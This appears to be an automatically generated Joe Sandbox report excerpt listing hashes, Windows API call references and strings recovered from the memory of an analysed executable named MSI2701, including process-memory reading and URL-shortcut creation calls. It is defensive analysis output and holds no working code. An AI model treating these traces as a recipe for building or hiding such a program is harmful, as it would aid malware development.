• Opcode ID: e360c8c4f696706fadbb3da83c678894d1d8abb6a59421cedc852586ee405194
• Instruction ID: cb2aa09406732ffba9b8c2bb56e33e72522641adf07d83548ef0468b81d97f35
• Opcode Fuzzy Hash: e360c8c4f696706fadbb3da83c678894d1d8abb6a59421cedc852586ee405194
• Instruction Fuzzy Hash: DEE0D832654189F6D7155B7A9F0FFBF769CD70070BF504152E902D41D1DAE9CA00E165
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,004E3077), ref: 004E3544
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 7a0f8f1cccc724d551be29848173fd8c051efcb6f799e83d350b2ec311a9096e
• Instruction ID: d76774fba1cc635fa9344b08ff20e60c300114331af45721715136df010d4233
• Opcode Fuzzy Hash: 7a0f8f1cccc724d551be29848173fd8c051efcb6f799e83d350b2ec311a9096e
• Instruction Fuzzy Hash:
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
• Instruction ID: 1d7427525f3ac43d32c85596020b5aca531b6a138daeeb446a85b2ac30f614f6
• Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
• Instruction Fuzzy Hash: 9432A134A0021ACFCF28CF98C991ABEB7B5EF85304F14416EDE45A7316D635AE46CB94
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 88ee0e0cf66d94dcea3b388f133b5dc8d3d0b7e838fd9322d210fc66ccbbec43
                                                                                                                                                            • Instruction ID: d216950fbc25c329b20672c080dc805825c88ff55be2e1fd3a0a0db0b581f8cf
                                                                                                                                                            • Opcode Fuzzy Hash: 88ee0e0cf66d94dcea3b388f133b5dc8d3d0b7e838fd9322d210fc66ccbbec43
                                                                                                                                                            • Instruction Fuzzy Hash: F4321631D29F454DE7239635CD6233AA248AFB73C4F15D727E81AB5AA9EF2CC8835101
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 68badd1fbe253b0d879d46371f72c2abccb202998fff5d080248fd055400ec9a
                                                                                                                                                            • Instruction ID: ae44092e2a74e64d2cb171db507bcb8d3e4631932f93c720eff15e3c942e904b
                                                                                                                                                            • Opcode Fuzzy Hash: 68badd1fbe253b0d879d46371f72c2abccb202998fff5d080248fd055400ec9a
                                                                                                                                                            • Instruction Fuzzy Hash: 47E1DD706006858FCB24CF6AC580A6BB7F1FF44316B208A5FE5469B391D338BC52CB1A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3471368781-0
                                                                                                                                                            • Opcode ID: 099ddb40c3680d8bc8e5c06ffc85dfacb4b45405e266b0be8acd4b2451084259
                                                                                                                                                            • Instruction ID: af7fb6ead695b3246e1bc5b57dcffad82c643214ff761dd6d22a086e946f1710
                                                                                                                                                            • Opcode Fuzzy Hash: 099ddb40c3680d8bc8e5c06ffc85dfacb4b45405e266b0be8acd4b2451084259
                                                                                                                                                            • Instruction Fuzzy Hash: 86B108759007498BDB34AF25CC82AB7B3AAEF44318F14456FEB43C6680E6B9F941C718
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                            • Instruction ID: 616add1f543005d99f16ad70b76089836ffd2373b331d58e83f441f2d08a5c9a
                                                                                                                                                            • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                            • Instruction Fuzzy Hash: D6518072E00259AFDF14CF99C981AAEBBB2FF88310F198059E815AB341C7349E51CB95
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                            • Instruction ID: a2fea97143f9d09f991111fc30c36652d389acba8ef23dc5173227f93abb97d0
                                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                            • Instruction Fuzzy Hash: DC1138F72000C243D604C63FC4B85B7E395EBC6327B2C43ABC082AB75AC22AA941960C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                            • Instruction ID: f88cb635b2420a4bff4fc68724fbb43bf0e3a8bf1cffaefa8131354b3f5853bf
                                                                                                                                                            • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                            • Instruction Fuzzy Hash: 0AE08CB291123CEBCB14DB99C90499AF3EDEB84B05B15049BF605D3601C278DE00D7D6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                            • Instruction ID: cc4e3ee19720792a92fa61d17edfbbc4a598f4322ca28d3154e36d2d11f07722
                                                                                                                                                            • Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                            • Instruction Fuzzy Hash: 4CC08C34002E0846CE2989108BB13FA3355B791782F80058EC6070BB46C55EBC83D605
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004E011D
                                                                                                                                                            • collate.LIBCPMT ref: 004E0126
                                                                                                                                                              • Part of subcall function 004DEDF2: __EH_prolog3_GS.LIBCMT ref: 004DEDF9
                                                                                                                                                              • Part of subcall function 004DEDF2: __Getcoll.LIBCPMT ref: 004DEE5D
                                                                                                                                                            • __Getcoll.LIBCPMT ref: 004E016C
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0180
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0195
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E01D3
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E01E6
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E022C
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0260
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E031B
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E032E
                                                                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E034B
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0368
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0385
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E02BD
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• numpunct.LIBCPMT ref: 004E03C4
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E03D4
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0418
  • Part of subcall function 004C6330: LocalAlloc.KERNEL32(00000040,?,004D0E04,00000020,?,?,004C9942,00000000,C7C71CC4,?,?,?,?,005050DD,000000FF), ref: 004C6336
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E042B
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004E0448
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
• String ID:
• API String ID: 3717464618-0
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 004C667E
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004C66D7
• LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004C66E2
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004C66FE
• WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,005049E5,000000FF), ref: 004C67DB
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,005049E5,000000FF), ref: 004C67E7
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,005049E5), ref: 004C682F
• LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,005049E5,000000FF), ref: 004C684A
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,005049E5), ref: 004C6867
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,005049E5,000000FF), ref: 004C6891
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 004C68D8
• ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 004C692A
• LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,005049E5,000000FF), ref: 004C695C
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
• String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
• API String ID: 2199533872-3004881174
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(0051DD3C,00000FA0,?,?,004E2B6A), ref: 004E2B98
• GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,004E2B6A), ref: 004E2BA3
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,004E2B6A), ref: 004E2BB4
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004E2BC6
• GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004E2BD4
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,004E2B6A), ref: 004E2BF7
• DeleteCriticalSection.KERNEL32(0051DD3C,00000007,?,?,004E2B6A), ref: 004E2C13
• CloseHandle.KERNEL32(00000000,?,?,004E2B6A), ref: 004E2C23
Strings
• WakeAllConditionVariable, xrefs: 004E2BCC
• SleepConditionVariableCS, xrefs: 004E2BC0
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 004E2B9E
• kernel32.dll, xrefs: 004E2BAF
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
• String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 2565136772-3242537097
APIs
• IsInExceptionSpec.LIBVCRUNTIME ref: 004E5DAC
• type_info::operator==.LIBVCRUNTIME ref: 004E5DCE
• ___TypeMatch.LIBVCRUNTIME ref: 004E5EDD
• IsInExceptionSpec.LIBVCRUNTIME ref: 004E5FAF
• _UnwindNestedFrames.LIBCMT ref: 004E6033
• CallUnexpected.LIBVCRUNTIME ref: 004E604E
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2123188842-393685449
APIs
• OpenProcess.KERNEL32(00000400,00000000,?,C7C71CC4,?,?,?), ref: 004C42D2
• OpenProcess.KERNEL32(00000400,00000000,?,?,C7C71CC4,?,?,?), ref: 004C42F3
• GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,C7C71CC4,?,?,?), ref: 004C4326
• GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,C7C71CC4,?,?,?), ref: 004C4337
• CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C4355
• CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C4371
• CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C4399
• CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C43B5
• CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C43D3
• CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C43EF
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: CloseHandle$Process$OpenTimes
• String ID:
• API String ID: 1711917922-0
APIs
• __EH_prolog3.LIBCMT ref: 004DBBC4
  • Part of subcall function 004D254E: __EH_prolog3.LIBCMT ref: 004D2555
  • Part of subcall function 004D254E: std::_Lockit::_Lockit.LIBCPMT ref: 004D255F
  • Part of subcall function 004D254E: std::_Lockit::~_Lockit.LIBCPMT ref: 004D25D0
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
• String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
• API String ID: 1538362411-2891247106
APIs
• __EH_prolog3.LIBCMT ref: 004E0CA4
  • Part of subcall function 004C9270: std::_Lockit::_Lockit.LIBCPMT ref: 004C92A0
  • Part of subcall function 004C9270: std::_Lockit::_Lockit.LIBCPMT ref: 004C92C2
  • Part of subcall function 004C9270: std::_Lockit::~_Lockit.LIBCPMT ref: 004C92EA
  • Part of subcall function 004C9270: std::_Lockit::~_Lockit.LIBCPMT ref: 004C9422
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
• String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
• API String ID: 1383202999-2891247106
APIs
• __EH_prolog3.LIBCMT ref: 004DBF85
  • Part of subcall function 004C8610: std::_Lockit::_Lockit.LIBCPMT ref: 004C8657
  • Part of subcall function 004C8610: std::_Lockit::_Lockit.LIBCPMT ref: 004C8679
  • Part of subcall function 004C8610: std::_Lockit::~_Lockit.LIBCPMT ref: 004C86A1
  • Part of subcall function 004C8610: std::_Lockit::~_Lockit.LIBCPMT ref: 004C880E
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
• String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
• API String ID: 1383202999-2891247106
APIs
  • Part of subcall function 004C36D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004C3735
  • Part of subcall function 004C36D0: _wcschr.LIBVCRUNTIME ref: 004C37C6
• GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 004C3CA8
• ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 004C3D01
• ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 004C3D7A
• ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 004C3EB1
• GetLastError.KERNEL32 ref: 004C3F34
• FreeLibrary.KERNEL32(?), ref: 004C3F7B
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
• String ID: NtQueryInformationProcess$1Q
• API String ID: 566592816-1657583799
APIs
• _ValidateLocalCookies.LIBCMT ref: 004E3F57
• ___except_validate_context_record.LIBVCRUNTIME ref: 004E3F5F
• _ValidateLocalCookies.LIBCMT ref: 004E3FE8
• __IsNonwritableInCurrentImage.LIBCMT ref: 004E4013
• _ValidateLocalCookies.LIBCMT ref: 004E4068
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
